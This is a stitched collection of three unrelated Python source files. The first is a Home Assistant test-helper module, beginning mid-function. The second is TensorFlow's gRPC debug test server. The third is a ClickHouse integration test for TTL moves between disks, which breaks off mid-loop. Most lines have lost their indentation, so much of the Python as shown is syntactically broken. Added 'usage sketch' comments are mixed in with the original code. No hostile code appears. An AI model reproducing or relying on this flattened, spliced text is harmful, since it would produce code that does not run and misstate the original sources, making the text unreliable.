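    entry.add_to_hass(hass)
    return entry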
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, "name", fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, "name", fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if "homeassistant/components" in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding="utf-8")
# Not found
raise FileNotFoundError(f"File not found: {fname}")
return patch.object(yaml_loader, "open", mock_open_f, create=True)
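# Hedged usage sketch (not part of the original helpers): patch_yaml_files lets
# a test serve YAML content from memory instead of the filesystem. The file
# name and YAML body below are illustrative only.
def _example_patch_yaml_files_usage():
    """Sketch: make load_yaml return an in-memory configuration.yaml."""
    files = {"configuration.yaml": "homeassistant:\n  name: Hypothetical Home\n"}
    return patch_yaml_files(files)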
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
fut = asyncio.Future()
if exception is not None:
fut.set_exception(exception)
else:
fut.set_result(return_value)
return fut
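# Hedged usage sketch (not part of the original helpers): mock_coro returns an
# already-resolved Future, so it can stand in for a coroutine in patched code
# (e.g. patch(..., return_value=mock_coro(...)) for a hypothetical target).
def _example_mock_coro_usage():
    """Sketch: the future returned by mock_coro is already resolved."""
    fut = mock_coro(return_value=42)
    assert fut.done() and fut.result() == 42
    return fut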
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
    - count: The number of valid platforms that should be set up.
    - domain: The domain to count. Optional; it can usually be determined
      automatically.
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
async def mock_psc(hass, config_input, integration):
"""Mock the prepare_setup_component to capture config."""
domain_input = integration.domain
res = await async_process_component_config(hass, config_input, integration)
config[domain_input] = None if res is None else res.get(domain_input)
_LOGGER.debug(
"Configuration for %s, Validated: %s, Original %s",
domain_input,
config[domain_input],
config_input.get(domain_input),
)
return res
assert isinstance(config, dict)
with patch("homeassistant.config.async_process_component_config", mock_psc):
yield config
if domain is None:
assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format(
list(config.keys())
)
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert (
res_len == count
), f"setup_component failed, expected {count} got {res_len}: {res}"
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
last_states = {}
for state in states:
restored_state = state.as_dict()
restored_state["attributes"] = json.loads(
json.dumps(restored_state["attributes"], cls=JSONEncoder)
)
last_states[state.entity_id] = restore_state.StoredState(
State.from_dict(restored_state), now
)
data.last_states = last_states
_LOGGER.debug("Restore cache: %s", data.last_states)
assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}"
hass.data[key] = data
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if "entity_id" in values:
self.entity_id = values["entity_id"]
@property
def name(self):
"""Return the name of the entity."""
return self._handle("name")
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle("should_poll")
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle("unique_id")
@property
def state(self):
"""Return the state of the entity."""
return self._handle("state")
@property
def available(self):
"""Return True if entity is available."""
return self._handle("available")
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle("device_info")
@property
def device_class(self):
"""Info how device should be classified."""
return self._handle("device_class")
@property
def unit_of_measurement(self):
"""Info on the units the entity state is in."""
return self._handle("unit_of_measurement")
@property
def capability_attributes(self):
"""Info about capabilities."""
return self._handle("capability_attributes")
@property
def supported_features(self):
"""Info about supported features."""
return self._handle("supported_features")
@property
def entity_registry_enabled_default(self):
"""Return if the entity should be enabled when first added to the entity registry."""
return self._handle("entity_registry_enabled_default")
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if "data" not in mock_data or "version" not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info("Loading data for %s: %s", store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
_LOGGER.info("Writing data to %s: %s", store.key, data_to_write)
# To ensure that the data can be serialized
data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder))
async def mock_remove(store):
"""Remove data."""
data.pop(store.key, None)
with patch(
"homeassistant.helpers.storage.Store._async_load",
side_effect=mock_async_load,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store._write_data",
side_effect=mock_write_data,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store.async_remove",
side_effect=mock_remove,
autospec=True,
):
yield data
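# Hedged usage sketch (not part of the original helpers): seed mock_storage with
# pre-existing store contents and inspect what a component wrote afterwards.
# The storage key "hypothetical/config" and its payload are illustrative only.
def _example_mock_storage_usage():
    """Sketch: run code under mock_storage and return the captured writes."""
    seed = {"hypothetical/config": {"version": 1, "data": {"enabled": True}}}
    with mock_storage(seed) as stored:
        # ... exercise code that reads/writes homeassistant.helpers.storage ...
        pass
    return stored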
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
store._async_cleanup_final_write_listener()
store._async_cleanup_delay_listener()
await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
"""Get system health info."""
return await hass.data["system_health"]["info"][domain](hass)
def mock_integration(hass, module):
"""Mock an integration."""
integration = loader.Integration(
hass, f"homeassistant.components.{module.DOMAIN}", None, module.mock_manifest()
)
_LOGGER.info("Adding mock integration: %s", module.DOMAIN)
hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration
hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module
return integration
def mock_entity_platform(hass, platform_path, module):
"""Mock a entity platform.
platform_path is in form light.hue. Will create platform
hue.light.
"""
domain, platform_name = platform_path.split(".")
mock_platform(hass, f"{platform_name}.{domain}", module)
def mock_platform(hass, platform_path, module=None):
"""Mock a platform.
    platform_path is in the form hue.config_flow.
"""
domain, platform_name = platform_path.split(".")
integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {})
module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
if domain not in integration_cache:
mock_integration(hass, MockModule(domain))
_LOGGER.info("Adding mock integration platform: %s", platform_path)
module_cache[platform_path] = module or Mock()
def async_capture_events(hass, event_name):
"""Create a helper that captures events."""
events = []
@ha.callback
def capture_events(event):
events.append(event)
hass.bus.async_listen(event_name, capture_events)
return events
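# Hedged usage sketch (not part of the original helpers): capture every event of
# one type fired on the bus during a test. EVENT_STATE_CHANGED and STATE_ON are
# imported above; the entity_id and asserted count are illustrative only.
async def _example_async_capture_events_usage(hass):
    """Sketch: record state_changed events fired while a test runs."""
    events = async_capture_events(hass, EVENT_STATE_CHANGED)
    hass.states.async_set("light.hypothetical", STATE_ON)
    await hass.async_block_till_done()
    assert len(events) == 1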
@ha.callback
def async_mock_signal(hass, signal):
"""Catch all dispatches to a signal."""
calls = []
@ha.callback
def mock_signal_handler(*args):
"""Mock service call."""
calls.append(args)
hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler)
return calls
class hashdict(dict):
"""
hashable dict implementation, suitable for use as a key into other dicts.
>>> h1 = hashdict({"apples": 1, "bananas":2})
>>> h2 = hashdict({"bananas": 3, "mangoes": 5})
>>> h1+h2
hashdict(apples=1, bananas=3, mangoes=5)
>>> d1 = {}
>>> d1[h1] = "salad"
>>> d1[h1]
'salad'
>>> d1[h2]
Traceback (most recent call last):
...
KeyError: hashdict(bananas=3, mangoes=5)
based on answers from
http://stackoverflow.com/questions/1151658/python-hashable-dicts
"""
def __key(self):
return tuple(sorted(self.items()))
def __repr__(self): # noqa: D105 no docstring
return ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key())
def __hash__(self): # noqa: D105 no docstring
return hash(self.__key())
def __setitem__(self, key, value): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def __delitem__(self, key): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def clear(self): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def pop(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def popitem(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def setdefault(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def update(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
# update is not ok because it mutates the object
# __add__ is ok because it creates a new object
# while the new object is under construction, it's ok to mutate it
def __add__(self, right): # noqa: D105 no docstring
result = hashdict(self)
dict.update(result, right)
return result
def assert_lists_same(a, b):
"""Compare two lists, ignoring order."""
assert collections.Counter([hashdict(i) for i in a]) == collections.Counter(
[hashdict(i) for i in b]
)
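# Hedged usage sketch (not part of the original helpers): assert_lists_same
# compares lists of dicts while ignoring order, which is handy for registry or
# device-trigger listings. The dicts below are illustrative only.
def _example_assert_lists_same_usage():
    """Sketch: order-insensitive comparison of two lists of dicts."""
    assert_lists_same(
        [{"domain": "light", "type": "turned_on"}, {"domain": "light", "type": "turned_off"}],
        [{"domain": "light", "type": "turned_off"}, {"domain": "light", "type": "turned_on"}],
    )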
|
grpc_debug_test_server.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""GRPC debug server for testing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import errno
import functools
import hashlib
import json
import os
import re
import shutil
import tempfile
import threading
import time
import portpicker
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.debug.lib import grpc_debug_server
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.ops import variables
def _get_dump_file_path(dump_root, device_name, debug_node_name):
"""Get the file path of the dump file for a debug node.
Args:
dump_root: (str) Root dump directory.
device_name: (str) Name of the device that the debug node resides on.
debug_node_name: (str) Name of the debug node, e.g.,
cross_entropy/Log:0:DebugIdentity.
Returns:
(str) Full path of the dump file.
"""
dump_root = os.path.join(
dump_root, debug_data.device_name_to_device_path(device_name))
if "/" in debug_node_name:
dump_dir = os.path.join(dump_root, os.path.dirname(debug_node_name))
dump_file_name = re.sub(":", "_", os.path.basename(debug_node_name))
else:
dump_dir = dump_root
dump_file_name = re.sub(":", "_", debug_node_name)
now_microsec = int(round(time.time() * 1000 * 1000))
dump_file_name += "_%d" % now_microsec
return os.path.join(dump_dir, dump_file_name)
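# Hedged usage sketch (not part of the original module): illustrates the dump
# path layout produced by _get_dump_file_path. The device and debug-node names
# are hypothetical; the trailing "_<microseconds>" suffix differs per call.
def _example_dump_file_path():
  """Sketch: build a dump file path for a hypothetical debug node."""
  return _get_dump_file_path(
      tempfile.mkdtemp(),
      "/job:localhost/replica:0/task:0/cpu:0",
      "cross_entropy/Log:0:DebugIdentity")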
class EventListenerTestStreamHandler(
grpc_debug_server.EventListenerBaseStreamHandler):
"""Implementation of EventListenerBaseStreamHandler that dumps to file."""
def __init__(self, dump_dir, event_listener_servicer):
super(EventListenerTestStreamHandler, self).__init__()
self._dump_dir = dump_dir
self._event_listener_servicer = event_listener_servicer
if self._dump_dir:
self._try_makedirs(self._dump_dir)
self._grpc_path = None
self._cached_graph_defs = []
self._cached_graph_def_device_names = []
self._cached_graph_def_wall_times = []
def on_core_metadata_event(self, event):
core_metadata = json.loads(event.log_message.message)
if not self._grpc_path:
grpc_path = core_metadata["grpc_path"]
if grpc_path:
if grpc_path.startswith("/"):
grpc_path = grpc_path[1:]
if self._dump_dir:
self._dump_dir = os.path.join(self._dump_dir, grpc_path)
# Write cached graph defs to filesystem.
for graph_def, device_name, wall_time in zip(
self._cached_graph_defs,
self._cached_graph_def_device_names,
self._cached_graph_def_wall_times):
self._write_graph_def(graph_def, device_name, wall_time)
if self._dump_dir:
self._write_core_metadata_event(event)
else:
self._event_listener_servicer.core_metadata_json_strings.append(
event.log_message.message)
def on_graph_def(self, graph_def, device_name, wall_time):
"""Implementation of the tensor value-carrying Event proto callback.
Args:
graph_def: A GraphDef object.
device_name: Name of the device on which the graph was created.
wall_time: An epoch timestamp (in microseconds) for the graph.
"""
if self._dump_dir:
if self._grpc_path:
self._write_graph_def(graph_def, device_name, wall_time)
else:
self._cached_graph_defs.append(graph_def)
self._cached_graph_def_device_names.append(device_name)
self._cached_graph_def_wall_times.append(wall_time)
else:
self._event_listener_servicer.partition_graph_defs.append(graph_def)
def on_value_event(self, event):
"""Implementation of the tensor value-carrying Event proto callback.
Writes the Event proto to the file system for testing. The path written to
follows the same pattern as the file:// debug URLs of tfdbg, i.e., the
name scope of the op becomes the directory structure under the dump root
directory.
Args:
event: The Event proto carrying a tensor value.
"""
if self._dump_dir:
self._write_value_event(event)
else:
value = event.summary.value[0]
self._event_listener_servicer.debug_tensor_values[value.node_name].append(
debug_data.load_tensor_from_event(event))
def _try_makedirs(self, dir_path):
if not os.path.isdir(dir_path):
try:
os.makedirs(dir_path)
except OSError as error:
if error.errno != errno.EEXIST:
raise
def _write_core_metadata_event(self, event):
core_metadata_path = os.path.join(
self._dump_dir,
debug_data.METADATA_FILE_PREFIX + debug_data.CORE_METADATA_TAG +
"_%d" % event.wall_time)
self._try_makedirs(self._dump_dir)
with open(core_metadata_path, "wb") as f:
f.write(event.SerializeToString())
def _write_graph_def(self, graph_def, device_name, wall_time):
encoded_graph_def = graph_def.SerializeToString()
graph_hash = int(hashlib.md5(encoded_graph_def).hexdigest(), 16)
event = event_pb2.Event(graph_def=encoded_graph_def, wall_time=wall_time)
graph_file_path = os.path.join(
self._dump_dir,
debug_data.device_name_to_device_path(device_name),
debug_data.METADATA_FILE_PREFIX + debug_data.GRAPH_FILE_TAG +
debug_data.HASH_TAG + "%d_%d" % (graph_hash, wall_time))
self._try_makedirs(os.path.dirname(graph_file_path))
with open(graph_file_path, "wb") as f:
f.write(event.SerializeToString())
def _write_value_event(self, event):
value = event.summary.value[0]
# Obtain the device name from the metadata.
summary_metadata = event.summary.value[0].metadata
if not summary_metadata.plugin_data:
raise ValueError("The value lacks plugin data.")
try:
content = json.loads(summary_metadata.plugin_data[0].content)
except ValueError as err:
raise ValueError("Could not parse content into JSON: %r, %r" % (content,
err))
device_name = content["device"]
dump_full_path = _get_dump_file_path(
self._dump_dir, device_name, value.node_name)
self._try_makedirs(os.path.dirname(dump_full_path))
with open(dump_full_path, "wb") as f:
f.write(event.SerializeToString())
class EventListenerTestServicer(grpc_debug_server.EventListenerBaseServicer):
"""An implementation of EventListenerBaseServicer for testing."""
def __init__(self, server_port, dump_dir):
"""Constructor of EventListenerTestServicer.
Args:
server_port: (int) The server port number.
dump_dir: (str) The root directory to which the data files will be
dumped. If empty or None, the received debug data will not be dumped
to the file system: they will be stored in memory instead.
"""
self.core_metadata_json_strings = []
self.partition_graph_defs = []
self.debug_tensor_values = collections.defaultdict(list)
grpc_debug_server.EventListenerBaseServicer.__init__(
self, server_port,
functools.partial(EventListenerTestStreamHandler, dump_dir, self))
def clear_data(self):
self.core_metadata_json_strings = []
self.partition_graph_defs = []
self.debug_tensor_values = collections.defaultdict(list)
def start_server_on_separate_thread(dump_to_filesystem=True,
server_start_delay_sec=0.0,
poll_server=False):
"""Create a test gRPC debug server and run on a separate thread.
Args:
dump_to_filesystem: (bool) whether the debug server will dump debug data
to the filesystem.
server_start_delay_sec: (float) amount of time (in sec) to delay the server
start up for.
poll_server: (bool) whether the server will be polled till success on
startup.
Returns:
server_port: (int) Port on which the server runs.
debug_server_url: (str) grpc:// URL to the server.
server_dump_dir: (str) The debug server's dump directory.
server_thread: The server Thread object.
server: The `EventListenerTestServicer` object.
Raises:
ValueError: If polling the server process for ready state is not successful
within maximum polling count.
"""
server_port = portpicker.pick_unused_port()
debug_server_url = "grpc://localhost:%d" % server_port
server_dump_dir = tempfile.mkdtemp() if dump_to_filesystem else None
server = EventListenerTestServicer(server_port=server_port,
dump_dir=server_dump_dir)
def delay_then_run_server():
time.sleep(server_start_delay_sec)
server.run_server()
server_thread = threading.Thread(target=delay_then_run_server)
server_thread.start()
if poll_server:
if not _poll_server_till_success(
50,
0.2,
debug_server_url,
server_dump_dir,
server,
gpu_memory_fraction=0.1):
raise ValueError(
"Failed to start test gRPC debug server at port %d" % server_port)
server.clear_data()
return server_port, debug_server_url, server_dump_dir, server_thread, server
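# Hedged usage sketch (not part of the original module, comments only): a test
# typically starts the server, points debug_urls at debug_server_url (as
# _poll_server_till_success does below), and shuts everything down afterwards.
# run_server()/stop_server() are assumed to come from the base servicer class.
# Example:
#     (port, url, dump_dir, thread,
#      server) = start_server_on_separate_thread(poll_server=True)
#     try:
#         pass  # run sessions with debug_urls=[url]
#     finally:
#         server.stop_server().wait()
#         thread.join()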
def _poll_server_till_success(max_attempts,
sleep_per_poll_sec,
debug_server_url,
dump_dir,
server,
gpu_memory_fraction=1.0):
"""Poll server until success or exceeding max polling count.
Args:
max_attempts: (int) How many times to poll at maximum
sleep_per_poll_sec: (float) How many seconds to sleep for after each
unsuccessful poll.
debug_server_url: (str) gRPC URL to the debug server.
dump_dir: (str) Dump directory to look for files in. If None, will directly
check data from the server object.
server: The server object.
gpu_memory_fraction: (float) Fraction of GPU memory to be
allocated for the Session used in server polling.
Returns:
    (bool) Whether the polling succeeded within max_attempts polls.
"""
poll_count = 0
config = config_pb2.ConfigProto(gpu_options=config_pb2.GPUOptions(
per_process_gpu_memory_fraction=gpu_memory_fraction))
with session.Session(config=config) as sess:
for poll_count in range(max_attempts):
server.clear_data()
print("Polling: poll_count = %d" % poll_count)
x_init_name = "x_init_%d" % poll_count
x_init = constant_op.constant([42.0], shape=[1], name=x_init_name)
x = variables.Variable(x_init, name=x_init_name)
run_options = config_pb2.RunOptions()
debug_utils.add_debug_tensor_watch(
run_options, x_init_name, 0, debug_urls=[debug_server_url])
try:
sess.run(x.initializer, options=run_options)
except errors.FailedPreconditionError:
pass
if dump_dir:
if os.path.isdir(
dump_dir) and debug_data.DebugDumpDir(dump_dir).size > 0:
shutil.rmtree(dump_dir)
print("Poll succeeded.")
return True
else:
print("Poll failed. Sleeping for %f s" % sleep_per_poll_sec)
time.sleep(sleep_per_poll_sec)
else:
if server.debug_tensor_values:
print("Poll succeeded.")
return True
else:
print("Poll failed. Sleeping for %f s" % sleep_per_poll_sec)
time.sleep(sleep_per_poll_sec)
return False
|
test.py
|
import json
import pytest
import random
import re
import string
import threading
import time
from multiprocessing.dummy import Pool
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
cluster = ClickHouseCluster(__file__)
node1 = cluster.add_instance('node1',
config_dir='configs',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
tmpfs=['/jbod1:size=40M', '/jbod2:size=40M', '/external:size=200M'],
macros={"shard": 0, "replica": 1} )
node2 = cluster.add_instance('node2',
config_dir='configs',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
tmpfs=['/jbod1:size=40M', '/jbod2:size=40M', '/external:size=200M'],
macros={"shard": 0, "replica": 2} )
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
def get_random_string(length):
    symbols = string.ascii_uppercase + string.digits
    return ''.join(random.choice(symbols) for _ in range(length))
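# Hedged note (not part of the original test): the tests below build ~1MB rows
# by embedding get_random_string(1024 * 1024) into INSERT statements, so the
# helper only needs uppercase letters and digits that are safe inside quotes.
# Example (illustrative sizes):
#     row = get_random_string(1024 * 1024)   # 1MB of [A-Z0-9]
#     assert len(row) == 1024 * 1024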
def get_used_disks_for_table(node, table_name):
return node.query("select disk_name from system.parts where table == '{}' and active=1 order by modification_time".format(table_name)).strip().split('\n')
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine,alter", [
("mt_test_rule_with_invalid_destination","MergeTree()",0),
("replicated_mt_test_rule_with_invalid_destination","ReplicatedMergeTree('/clickhouse/replicated_test_rule_with_invalid_destination', '1')",0),
("mt_test_rule_with_invalid_destination","MergeTree()",1),
("replicated_mt_test_rule_with_invalid_destination","ReplicatedMergeTree('/clickhouse/replicated_test_rule_with_invalid_destination', '1')",1),
])
def test_rule_with_invalid_destination(started_cluster, name, engine, alter):
try:
def get_command(x, policy):
x = x or ""
if alter and x:
return """
ALTER TABLE {name} MODIFY TTL {expression}
""".format(expression=x, name=name)
else:
return """
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
{expression}
SETTINGS storage_policy='{policy}'
""".format(expression=x, name=name, engine=engine, policy=policy)
if alter:
node1.query(get_command(None, "small_jbod_with_external"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO DISK 'unknown'", "small_jbod_with_external"))
node1.query("DROP TABLE IF EXISTS {}".format(name))
if alter:
node1.query(get_command(None, "small_jbod_with_external"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO VOLUME 'unknown'", "small_jbod_with_external"))
node1.query("DROP TABLE IF EXISTS {}".format(name))
if alter:
node1.query(get_command(None, "only_jbod2"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO DISK 'jbod1'", "only_jbod2"))
node1.query("DROP TABLE IF EXISTS {}".format(name))
if alter:
node1.query(get_command(None, "only_jbod2"))
with pytest.raises(QueryRuntimeException):
node1.query(get_command("TTL d1 TO VOLUME 'external'", "only_jbod2"))
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_inserts_to_disk_do_not_work","MergeTree()",0),
("replicated_mt_test_inserts_to_disk_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_disk_do_not_work', '1')",0),
("mt_test_inserts_to_disk_work","MergeTree()",1),
("replicated_mt_test_inserts_to_disk_work","ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_disk_work', '1')",1),
])
def test_inserts_to_disk_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time()-1 if i > 0 or positive else time.time()+300))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_moves_to_disk_do_not_work","MergeTree()",0),
("replicated_mt_test_moves_to_disk_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_disk_do_not_work', '1')",0),
("mt_test_moves_to_disk_work","MergeTree()",1),
("replicated_mt_test_moves_to_disk_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_disk_work', '1')",1),
])
def test_moves_to_disk_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
wait_expire_1 = 6
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1 if i > 0 or positive else time_2))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
wait_expire_1_thread.join()
time.sleep(wait_expire_2/2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine", [
("mt_test_moves_to_volume_work","MergeTree()"),
("replicated_mt_test_moves_to_volume_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_volume_work', '1')"),
])
def test_moves_to_volume_work(started_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
p1 Int64,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY p1
TTL d1 TO VOLUME 'external'
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
wait_expire_1 = 10
time_1 = time.time() + wait_expire_1
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for p in range(2):
data = [] # 10MB in total
for i in range(5):
data.append((str(p), "'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1))) # 1MB row
node1.query("INSERT INTO {} (p1, s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {'jbod1', 'jbod2'}
wait_expire_1_thread.join()
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_inserts_to_volume_do_not_work","MergeTree()",0),
("replicated_mt_test_inserts_to_volume_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_volume_do_not_work', '1')",0),
("mt_test_inserts_to_volume_work","MergeTree()",1),
("replicated_mt_test_inserts_to_volume_work","ReplicatedMergeTree('/clickhouse/replicated_test_inserts_to_volume_work', '1')",1),
])
def test_inserts_to_volume_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
p1 Int64,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY p1
TTL d1 TO VOLUME 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MOVES {name}".format(name=name))
for p in range(2):
data = [] # 20MB in total
for i in range(10):
data.append((str(p), "'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time()-1 if i > 0 or positive else time.time()+300))) # 1MB row
node1.query("INSERT INTO {} (p1, s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "20"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine", [
("mt_test_moves_to_disk_eventually_work","MergeTree()"),
("replicated_mt_test_moves_to_disk_eventually_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_disk_eventually_work', '1')"),
])
def test_moves_to_disk_eventually_work(started_cluster, name, engine):
try:
name_temp = name + "_temp"
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = MergeTree()
ORDER BY tuple()
SETTINGS storage_policy='only_jbod2'
""".format(name=name_temp))
data = [] # 35MB in total
for i in range(35):
